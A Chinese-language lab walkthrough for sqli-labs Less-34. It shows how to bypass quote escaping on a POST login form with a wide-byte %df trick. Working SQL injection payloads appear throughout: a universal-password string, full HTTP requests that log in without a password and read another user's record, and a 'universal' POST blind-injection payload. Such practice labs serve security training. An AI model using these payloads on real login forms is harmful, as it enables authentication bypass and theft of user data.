sqli-labs————Less-34(宽字节绕过、水平越权、盲注)

Less-34

sqli-labs————Less-34(宽字节绕过、水平越权、盲注)_第1张图片

方法一:
这一关是POST型的注入,同样的将post传递过来的内容进行了转义处理,过滤了单引号、反斜杠。有之前的例子我们可以看到%df可以将转义的反斜杠给吃掉。而GET型的方式我们是以url形式提交的,因此数据会通过urlencode,如何将方法用在POST型的注入当中呢?我们可以将UTF-8转换为UTF-16或者UTF-32,例如将'转换为utf-16为: '。我们可以利用这一点注入。

使用万能密码方式来突破:

username: 'or 1=1#

passwor:aaa

sqli-labs————Less-34(宽字节绕过、水平越权、盲注)_第2张图片

方法二:

因为这里使用到了表单的提交,所以我们可以使用burp suite进行数据的提交,之后对提交的数据进行修改:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'||1#&passwd=aaa&submit=Submit

sqli-labs————Less-34(宽字节绕过、水平越权、盲注)_第3张图片

从上面我们可以看到,我们并没有输入密码,却成功登录了,已越权

或者可以这样,获取别的用户的信息,实现水平越权:

POST /sqli-labs/Less-34/ HTTP/1.1
Host: 192.168.11.136
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Referer: http://192.168.11.136/sqli-labs/Less-34/
Cookie: PHPSESSID=6govstesrml4muhgt7sshceom1
Connection: close
Upgrade-Insecure-Requests: 1

uname=admin%df'or 1 limit 1,1#&passwd=aaa&submit=Submit

sqli-labs————Less-34(宽字节绕过、水平越权、盲注)_第4张图片

post型盲注通杀payload:

uname=admin%df'or()or%200%23&passwd=&submit=Submit

你可能感兴趣的:(【信息安全】,【渗透测试实战1】,———Sqli-labs实战)